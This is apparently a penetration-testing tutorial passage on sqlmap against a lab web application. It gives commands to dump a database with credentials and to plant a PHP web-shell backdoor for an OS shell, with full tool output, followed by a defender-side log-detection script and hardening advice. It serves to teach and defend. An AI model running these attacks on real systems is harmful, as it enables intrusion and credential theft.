We run sqlmap against our web application, setting the URL we want to scan with -u and specifying the parameter to test with -p:
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user
To dump the whole database, including the user credentials, we can run the same command as before with the --dump parameter.
sqlmap -u "http://192.168.50.19/blindsqli.php?user=1" -p user --dump
Another core feature of sqlmap is the --os-shell parameter, which gives us a full interactive shell.
First, we need to intercept the POST request with Burp and save it as a local text file on our Kali VM.
POST /search.php HTTP/1.1
Host: 192.168.50.19
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://192.168.50.19
Connection: close
Referer: http://192.168.50.19/search.php
Cookie: PHPSESSID=vchu1sfs34oosl52l7pb1kag7d
Upgrade-Insecure-Requests: 1
item=test
Next, we can invoke sqlmap with the -r parameter, passing the file that contains the POST request as its argument. We also need to tell sqlmap which parameter is vulnerable, in our case item. Finally, we include --os-shell together with the custom writable folder we found earlier.
kali@kali:~$ sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
...
[*] starting @ 02:20:47 PM /2022-05-19/
[14:20:47] [INFO] parsing HTTP request from 'post'
[14:20:47] [INFO] resuming back-end DBMS 'mysql'
[14:20:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: item (POST)
...
---
[14:20:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.6
[14:20:48] [INFO] going to use a web backdoor for command prompt
[14:20:48] [INFO] fingerprinting the back-end DBMS operating system
[14:20:48] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:20:49] [INFO] using '/var/www/html/tmp' as web server document root
[14:20:49] [INFO] retrieved web server absolute paths: '/var/www/html/search.php'
[14:20:49] [INFO] trying to upload the file stager on '/var/www/html/tmp/' via LIMIT 'LINES TERMINATED BY' method
[14:20:50] [WARNING] unable to upload the file stager on '/var/www/html/tmp/'
[14:20:50] [INFO] trying to upload the file stager on '/var/www/html/tmp/' via UNION method
[14:20:50] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:20:50] [INFO] the remote file '/var/www/html/tmp/tmpuqgek.php' is larger (713 B) than the local file '/tmp/sqlmapxkydllxb82218/tmp3d64iosz' (709B)
[14:20:51] [INFO] the file stager has been successfully uploaded on '/var/www/html/tmp/' - http://192.168.50.19:80/tmp/tmpuqgek.php
[14:20:51] [INFO] the backdoor has been successfully uploaded on '/var/www/html/tmp/' - http://192.168.50.19:80/tmp/tmpbetmz.php
[14:20:51] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: '/var/www/html/tmp'
Once sqlmap confirms the vulnerability, it prompts us for the language the web application is written in, which is PHP in this case. sqlmap then uploads the web shell to the specified web folder and returns the shell, from which we can issue regular system commands.
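As an added example that is not part of the original notes, the script below is a defender-side check over Apache access-log lines for the traces this --os-shell run leaves behind: the sqlmap User-Agent, injection keywords in query strings, and PHP files being requested from a writable web-root directory such as /tmp/. The log lines, the sqlmap version string and the list of legitimate endpoints are constructed assumptions for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not taken from the original notes)
# modelled on what the --os-shell run above would leave on the web server.
SAMPLE_ACCESS_LOG = """\
192.168.50.50 - - [19/May/2022:14:20:47 +0000] "POST /search.php HTTP/1.1" 200 1532 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
192.168.50.50 - - [19/May/2022:14:20:50 +0000] "POST /search.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
192.168.50.50 - - [19/May/2022:14:20:51 +0000] "GET /tmp/tmpuqgek.php HTTP/1.1" 200 713 "-" "Mozilla/5.0"
192.168.50.50 - - [19/May/2022:14:20:56 +0000] "POST /tmp/tmpbetmz.php HTTP/1.1" 200 98 "-" "Mozilla/5.0"
192.168.50.60 - - [19/May/2022:14:22:03 +0000] "GET /blindsqli.php?user=1%20UNION%20SELECT%201,2 HTTP/1.1" 200 412 "-" "curl/7.81.0"
192.168.50.70 - - [19/May/2022:14:25:10 +0000] "GET /search.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, identity, user, [timestamp], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

KNOWN_APP_FILES = {"/search.php", "/blindsqli.php"}  # the application's legitimate endpoints (from the notes)
WRITABLE_WEB_DIRS = ("/tmp/",)                        # web-root subdirectories the DBMS account can write into
INJECTION_MARKERS = ("union select", "lines terminated by", "into outfile")

def analyse_access_log(text):
    """Return (client_ip, reason, path) tuples for every suspicious request in the log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort mid-file
        ip, target, ua = m["ip"], m["target"], m["ua"]
        path, _, query = target.partition("?")
        decoded_query = unquote_plus(query).lower()  # decode %20 and + before keyword matching
        if "sqlmap" in ua.lower():
            findings.append((ip, "sqlmap user-agent", path))
        if any(marker in decoded_query for marker in INJECTION_MARKERS):
            findings.append((ip, "injection keyword in query string", path))
        # A .php file served from a writable directory that is not a known application file
        # matches the stager/backdoor that sqlmap drops with --os-shell.
        if path.startswith(WRITABLE_WEB_DIRS) and path.endswith(".php") and path not in KNOWN_APP_FILES:
            findings.append((ip, "php executed from writable web dir", path))
    return findings

def staged_webshell_paths(findings):
    """Distinct dropped-file paths to remove and to trace back to how they were written."""
    return sorted({path for _, reason, path in findings if reason == "php executed from writable web dir"})

if __name__ == "__main__":
    for finding in analyse_access_log(SAMPLE_ACCESS_LOG):
        print(*finding)
```

The stager upload in the output above works only because the MySQL account can write files (FILE privilege, permitted by secure_file_priv) into a directory the web server will execute from; tightening secure_file_priv and keeping the document root non-writable by the database user closes that path.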